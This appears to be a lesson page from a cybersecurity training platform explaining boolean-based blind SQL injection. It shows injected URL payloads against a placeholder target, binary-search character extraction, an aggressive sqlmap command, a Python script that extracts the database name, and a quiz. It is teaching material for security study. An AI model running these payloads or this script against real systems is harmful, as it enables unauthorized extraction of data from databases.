Vulnarex | Elite Cybersecurity Learning Platform

#Extracting Data Through True/False Questions#link

Boolean-based blind SQL injection is used when the application doesn't return query results or error messages, but does behave differently based on whether a condition is true or false. By asking the database a series of true/false questions, we can extract data one bit at a time.

Having covered error-based extraction, we now tackle the more challenging scenario where applications provide no direct feedback, requiring us to infer information from subtle behavioral differences.

Understanding Boolean Blind Injection

In boolean blind injection, you inject conditions that evaluate to true or false and observe how the application responds. A true condition might return the expected page content, while a false condition returns an error or empty result.

bash

# True condition - returns product details
http://target.com/product.php?id=1 AND 1=1--

# False condition - returns nothing or error
http://target.com/product.php?id=1 AND 1=2--

Extracting Data Character by Character

The core technique involves using string functions to test individual characters of the data you want to extract. By combining SUBSTRING() with ASCII comparisons, you can determine each character's value.

bash

# Test if first character of version is '5'
http://target.com/product.php?id=1 AND substring(version(),1,1)='5'--

# Test if second character is '.'
http://target.com/product.php?id=1 AND substring(version(),2,1)='.'--

# Using ASCII for more precise testing
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))=53--

Binary Search Optimization

Instead of testing each possible character value, use binary search to minimize the number of requests needed. This reduces extraction time from O(n) to O(log n) per character.

bash

# Is ASCII value > 64? (binary search)
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))>64--

# Is ASCII value > 96?
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))>96--

# Is ASCII value > 112?
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))>112--

# Narrow down to exact value
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))=118--

info

💡 Binary search reduces the average number of requests per character from 50 (linear) to 7 (log2 of 128 possible ASCII values).

Automating Boolean Blind Extraction

Due to the repetitive nature of boolean blind injection, automation is essential. Tools like sqlmap can automate the entire process.

Automating with sqlmap

root@vulnarex:~#sqlmap -u 'http://target.com/product.php?id=1(opens in new tab)' --technique=B --level=5 --risk=3 --batch

STRICT SECURE AUDIT RULE

⚠️ Boolean blind injection requires many HTTP requests, making it slow and potentially detectable. Always use rate limiting and consider the stealth implications during assessments.

Practical Example

Let's extract the current database name using boolean blind injection.

python

import requests

def check_char(position, char_value):
    url = (
        f"http://target.com/product.php?id=1 "
        f"AND ascii(substring(database(),{position},1))={char_value}"
    )
    response = requests.get(url)
    return "Product found" in response.text

def extract_string(length):
    result = ""

    for i in range(1, length + 1):
        for char in range(32, 127):
            if check_char(i, char):
                result += chr(char)
                break

    return result

print(extract_string(20))

quiz BLOCK (★ 50 XP)

What is the main disadvantage of boolean-based blind SQL injection compared to other techniques?

Select your proof vectors above

Boolean-Based Blind SQL Injection

#Extracting Data Through True/False Questions#link

Understanding Boolean Blind Injection

Extracting Data Character by Character

Binary Search Optimization

Automating Boolean Blind Extraction

Practical Example

What is the main disadvantage of boolean-based blind SQL injection compared to other techniques?

Verification Proof Checkpoint